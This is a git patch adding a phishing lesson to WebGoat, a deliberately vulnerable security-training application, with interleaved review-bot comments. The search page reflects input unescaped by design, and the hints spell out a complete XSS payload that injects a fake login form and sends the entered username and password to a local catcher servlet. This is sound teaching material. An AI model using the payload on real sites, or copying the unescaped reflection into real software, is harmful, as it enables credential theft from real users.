From 34fca4321691463071226b8ab2c88d8864829f69 Mon Sep 17 00:00:00 2001
From: mayhew64
Date: Mon, 19 Mar 2007 17:47:37 +0000
Subject: [PATCH] New Phishing Lesson

git-svn-id: http://webgoat.googlecode.com/svn/trunk@119 4033779f-a91e-0410-96ef-6bf7bf53c507
---
 .../JavaSource/org/owasp/webgoat/Catcher.java | 116 +++++++
 .../org/owasp/webgoat/LessonSource.java | 112 +++----
 .../org/owasp/webgoat/lessons/Phishing.java | 282 ++++++++++++++++++
 .../webgoat/lessons/admin/ViewDatabase.java | 2 +-
 .../project/WebContent/WEB-INF/web-unix.xml | 20 +-
 .../WebContent/WEB-INF/web-windows.xml | 17 +-
 .../main/project/WebContent/WEB-INF/web.xml | 17 +-
 7 files changed, 486 insertions(+), 80 deletions(-)
 create mode 100644 webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
 create mode 100644 webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java

diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
new file mode 100644
index 000000000..c23bd5152
--- /dev/null
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
@@ -0,0 +1,116 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.util.Enumeration;
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ *
+ *
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ *
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ *
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created March 13, 2007
+ */
+public class Catcher extends HammerHead
+{
+
+ /**
+ * Description of the Field
+ */
+ public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
+
+ public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
+
+ public static final String PROPERTY = "PROPERTY";
+
+ public static final String EMPTY_STRING = "";
+
+
+ /**
+ * Description of the Method
+ *
+ * @param request Description of the Parameter
+ * @param response Description of the Parameter
+ * @exception IOException Description of the Exception
+ * @exception ServletException Description of the Exception
+ */
+ public void doPost(HttpServletRequest request, HttpServletResponse response)
+ throws IOException, ServletException
+ {
+ try
+ {
+ //System.out.println( "Entering doPost: " );
+ //System.out.println( " - request " + request);
+ //System.out.println( " - principle: " + request.getUserPrincipal() );
+ //setCacheHeaders(response, 0);
+ WebSession session = (WebSession) request.getSession(true)
+ .getAttribute(WebSession.SESSION);
+ session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
+
+ int scr = session.getCurrentScreen();
+ Course course = session.getCourse();
+ AbstractLesson lesson = course.getLesson(session, scr,
+ AbstractLesson.USER_ROLE);
+
+ log(request, lesson.getClass().getName() + " | "
+ + session.getParser().toString());
+
+ String property = new String(session.getParser().getStringParameter(
+ PROPERTY, EMPTY_STRING));
+
+ // if the PROPERTY parameter is available - write all the parameters to the
+ // property file. No other control parameters are supported at this time.
+ if ( !property.equals(EMPTY_STRING))
+ {
+ Enumeration e = session.getParser().getParameterNames();
+
+ while (e.hasMoreElements())
+ {
+ String name = (String) e.nextElement();
+ String value= session.getParser().getParameterValues(name)[0];
+ lesson.getLessonTracker(session).getLessonProperties().setProperty(
+ name, value);
+ }
+ }
+ lesson.getLessonTracker(session).store(session, lesson);
+
+ }
+ catch (Throwable t)
+ {
+ t.printStackTrace();
+ log("ERROR: " + t);
+ }
+ }
+}
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
index 9f8ff6470..79acbe650 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
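Review bot: `log(request, lesson.getClass().getName() + " | " + session.getParser().toString())` writes the whole parsed request to the container log, and the loop under `if ( !property.equals(EMPTY_STRING))` then copies every parameter value into the lesson property file; since this servlet exists to receive the form fields a lesson has captured, those values are the submitted credentials, and the log line duplicates them into a second, unmanaged location (assuming the parser's `toString()` dumps values, as its use here suggests). Logging only the names from `session.getParser().getParameterNames()` keeps the trace without the values. The `catch (Throwable t)` also absorbs the `NullPointerException` raised when no `WebSession` attribute is present, so the client receives an empty 200 and only the log shows `ERROR`; checking `session == null` up front and answering with `response.sendError(HttpServletResponse.SC_BAD_REQUEST)` would make that case explicit. `START_SOURCE_SKIP` and `END_SOURCE_SKIP` are never referenced in this class and look carried over from LessonSource, and `new String(...)` around `getStringParameter(...)` is a redundant copy; both can be dropped.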
@@ -67,80 +67,50 @@ public class LessonSource extends HammerHead public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { - String source = null; - - try - { - //System.out.println( "Entering doPost: " ); - //System.out.println( " - request " + request); - //System.out.println( " - principle: " + request.getUserPrincipal() ); - //setCacheHeaders(response, 0); - WebSession session = (WebSession) request.getSession(true) - .getAttribute(WebSession.SESSION); - session.update(request, response, this.getServletName()); // FIXME: Too much in this call. - - // Get the Java source of the lesson. FIXME: Not needed - source = getSource(session); - - int scr = session.getCurrentScreen(); - Course course = session.getCourse(); - AbstractLesson lesson = course.getLesson(session, scr, - AbstractLesson.USER_ROLE); - lesson.getLessonTracker(session).setViewedSource(true); - } - catch (Throwable t) - { - t.printStackTrace(); - log("ERROR: " + t); - } - finally - { - try - { - this.writeSource(source, response); - } - catch (Throwable thr) - { - thr.printStackTrace(); - log(request, "Could not write error screen: " - + thr.getMessage()); - } - //System.out.println( "Leaving doPost: " ); - - } + String source = null; + + try + { + //System.out.println( "Entering doPost: " ); + //System.out.println( " - request " + request); + //System.out.println( " - principle: " + request.getUserPrincipal() ); + //setCacheHeaders(response, 0); + WebSession session = (WebSession) request.getSession(true) + .getAttribute(WebSession.SESSION); + session.update(request, response, this.getServletName()); // FIXME: Too much in this call. + + // Get the Java source of the lesson. 
FIXME: Not needed + source = getSource(session); + + int scr = session.getCurrentScreen(); + Course course = session.getCourse(); + AbstractLesson lesson = course.getLesson(session, scr, + AbstractLesson.USER_ROLE); + lesson.getLessonTracker(session).setViewedSource(true); + } + catch (Throwable t) + { + t.printStackTrace(); + log("ERROR: " + t); + } + finally + { + try + { + this.writeSource(source, response); + } + catch (Throwable thr) + { + thr.printStackTrace(); + log(request, "Could not write error screen: " + + thr.getMessage()); + } + //System.out.println( "Leaving doPost: " ); + + } } - protected WebSession updateSession_DELETEME(HttpServletRequest request, - HttpServletResponse response, ServletContext context) - { - HttpSession hs; - hs = request.getSession(true); - - //System.out.println( "Entering Session_id: " + hs.getId() ); - // dumpSession( hs ); - - // Make a temporary session to avoid the concurreny issue - // in WebSession - WebSession session = new WebSession(this, context); - - WebSession realSession = null; - Object o = hs.getAttribute(WebSession.SESSION); - - if ((o != null) && o instanceof WebSession) - { - realSession = (WebSession) o; - } - session.setCurrentScreen(realSession.getCurrentScreen()); - session.setCourse(realSession.getCourse()); - session.setRequest(request); - - // to authenticate - //System.out.println( "Leaving Session_id: " + hs.getId() ); - //dumpSession( hs ); - return (session); - } - /** * Description of the Method diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java new file mode 100644 index 000000000..5077ddd0d --- /dev/null +++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java 
@@ -0,0 +1,282 @@ +package org.owasp.webgoat.lessons; + +import java.util.ArrayList; +import java.util.List; + +import org.apache.ecs.Element; +import org.apache.ecs.ElementContainer; +import org.apache.ecs.StringElement; +import org.apache.ecs.html.B; +import org.apache.ecs.html.BR; +import org.apache.ecs.html.Comment; +import org.apache.ecs.html.H1; +import org.apache.ecs.html.HR; +import org.apache.ecs.html.Input; +import org.apache.ecs.html.TD; +import org.apache.ecs.html.TH; +import org.apache.ecs.html.TR; +import org.apache.ecs.html.Table; +import org.owasp.webgoat.Catcher; +import org.owasp.webgoat.session.ECSFactory; +import org.owasp.webgoat.session.WebSession; + +/******************************************************************************* + * + * + * This file is part of WebGoat, an Open Web Application Security Project + * utility. For details, please see http://www.owasp.org/ + * + * Copyright (c) 2002 - 2007 Bruce Mayhew + * + * This program is free software; you can redistribute it and/or modify it under + * the terms of the GNU General Public License as published by the Free Software + * Foundation; either version 2 of the License, or (at your option) any later + * version. + * + * This program is distributed in the hope that it will be useful, but WITHOUT + * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS + * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more + * details. + * + * You should have received a copy of the GNU General Public License along with + * this program; if not, write to the Free Software Foundation, Inc., 59 Temple + * Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Getting Source ============== + * + * Source for this application is maintained at code.google.com, a repository + * for free software projects. 
+ * + * For details, please see http://code.google.com/p/webgoat/ + * + * @author Bruce Mayhew WebGoat + * @created March 13, 2007 + */ +public class Phishing extends LessonAdapter +{ + + /** + * Description of the Field + */ + protected final static String SEARCH = "Username"; + private String searchText; + + + /** + * Description of the Method + * + * @param s Description of the Parameter + * @return Description of the Return Value + */ + private boolean postedCredentials(WebSession s) + { + String postedToCookieCatcher = getLessonTracker(s).getLessonProperties() + .getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING); + + // + return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING)); + // + } + + + /** + * Description of the Method + * + * @param s Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + try + { + searchText = s.getParser().getRawParameter(SEARCH,""); + // + // + + ec.addElement(makeSearch(s)); + if (postedCredentials(s)) + { + makeSuccess(s); + } + } + catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + } + + return (ec); + } + + + protected Element makeSearch(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + ec.addElement(new H1().addElement("WebGoat Search ")); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) + .setAlign("center"); + + TR tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + if (s.isColor()) + { + t.setBorder(1); + } + + tr = new TR(); + tr + .addElement(new TH() + .addElement( + "This facility will search the WebGoat source.") + .setColSpan(2).setAlign("center")); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + + TR row1 = new TR(); + row1.addElement(new TD(new B(new StringElement("Search: 
"))).setAlign("right")); + + Input input1 = new Input(Input.TEXT, SEARCH, searchText); + row1.addElement(new TD(input1).setAlign("left")); + t.addElement(row1); + + Element b = ECSFactory.makeButton("Search"); + t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center")); + ec.addElement(t); + + if (!searchText.equals("")) + { + ec.addElement(new BR()); + ec.addElement(new HR()); + ec.addElement(new BR()); + ec.addElement(new StringElement("Results for: " + searchText)); + ec.addElement(new Comment("Search results")); + ec.addElement(new BR()); + ec.addElement(new BR()); + ec.addElement(new B(new StringElement("No results were found."))); + ec.addElement(new Comment("End of Search results")); + } + + return (ec); + } + + + /** + * Gets the hints attribute of the CluesScreen object + * + * @return The hints value + */ + protected List getHints() + { + List hints = new ArrayList(); + hints + .add("Try adding HTML to the search field to create a fake authentication form.
" + + "Try to make the form look official."); + hints.add("Try:
" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br></form><br><br><HR>"); + hints.add("Add functionality that can post a request, a button might work

" + + "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" + + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); + hints.add("Try:
" + + "<input type="submit" name="login" " + + "value="login">"+ + "

Solution for this hint:

" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); + hints.add("Make the button perform an action on submit,
" + + "adding an onclick=\"hack()\" might work
"+ + "Don't forget to add the hack() javascript function" + + "

Solution for this hint:

" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); + hints.add("You need to create the hack() function. This function will pull the credentials from the " + + "webpage and post them to the WebGoat catcher servlet.
" + + "
Some useful code snippets:
    " + + "
  • doucument.forms[0].user.value - will access the user field" + + "
  • XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" + + "
  • javascript string concatentation uses a \"+\"
" + + "

Solution for this hint():

" + + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." + + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " + + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" + + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" + + "</script>"); + hints.add("Complete solution for this lesson:

" + + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." + + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " + + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" + + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" + + "</script><form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); + /** + * password



This feature requires account login:



Enter Username:

Enter Password:




FeedbackAddress - <A HREF=mailto:webgoat@g2-inc.com>webgoat@g2-inc.com</A> + <A HREF=mailto:WebGoat@g2-inc.com>WebGoat@g2-inc.com</A> @@ -174,6 +174,14 @@ org.owasp.webgoat.LessonSource + + CookieCatcher + + This servlet catches any posts and marks the appropriate lesson property. + + org.owasp.webgoat.CookieCatcher + + conf /lessons/ConfManagement/config.jsp @@ -195,8 +203,7 @@ It is also legal to define more than one mapping for the same servlet, if you wish to. --> - - + AxisServlet /servlet/AxisServlet @@ -235,11 +242,16 @@ /source + + CookieCatcher + /catcher + + conf /conf - +
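Review bot: The servlet-class value added in the `@@ -174,6 +174,14 @@` hunk, `org.owasp.webgoat.CookieCatcher`, does not match the class this commit creates, `org.owasp.webgoat.Catcher` (`package org.owasp.webgoat;` and `public class Catcher extends HammerHead` in Catcher.java), so the container will fail to instantiate the `CookieCatcher` servlet and the `/catcher` mapping added in the `@@ -235,11 +242,16 @@` hunk will never reach the new code, unless a `CookieCatcher` class already exists outside this change. Change the entry to `org.owasp.webgoat.Catcher` (or rename the class); the same entry presumably appears in the web-windows.xml and web.xml sections listed in the diffstat but not shown here. The hints in Phishing.java point at both `http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE` and `http://localhost./WebGoat/catcher?PROPERTY=yes&...`; only the `/catcher` form matches this mapping, so the `/capture/` hint should be corrected too. The element tags are stripped in this rendering, so the value is read by its position in the servlet entry.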